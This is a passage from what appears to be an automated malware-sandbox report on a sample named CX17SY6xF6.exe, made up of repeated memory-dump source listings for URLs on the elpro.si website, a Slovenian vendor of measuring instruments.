00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/avtorji/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/category/aktualno/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/disclaimer/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/elpro-laboratorij-za-kalibracije/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/en/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/el-pro-set4/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/o320-3003-180-500-m-temperaturno-tipalo-termoelement-tc-oplascen-s-prik
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/ttu-gla-010-11a3l-160-30559-twrsb-0-0-ptfe-temperaturno-tipalo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/izdelek/v400-7022-temperaturno-tipalo-uporovno-rtd-vticno-s-prikljucnim-kablom-
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/analizato
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/aplikacij
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/kamere-en
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/merilnik-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/analizatorji-dimnih-plinov-kamere-in-ostala-oprema/potrosni-
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/arhiv/
                  Source: CX17SY6xF6.exe, 00000000.00000003.695363892.0000000003560000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/datalog
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/dodatna
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703472522.0000000004500000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.586330546.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.703737392.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.706043620.0000000004660000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.elpro.si/kategorija-izdelka/comet-vlaga-temperatura-dew-point-co2-tlak-in-ostalo/lastnov
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587660793.0000000003990000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.587785142.00000000039F0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.707720564.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.583312553.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.585395327.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 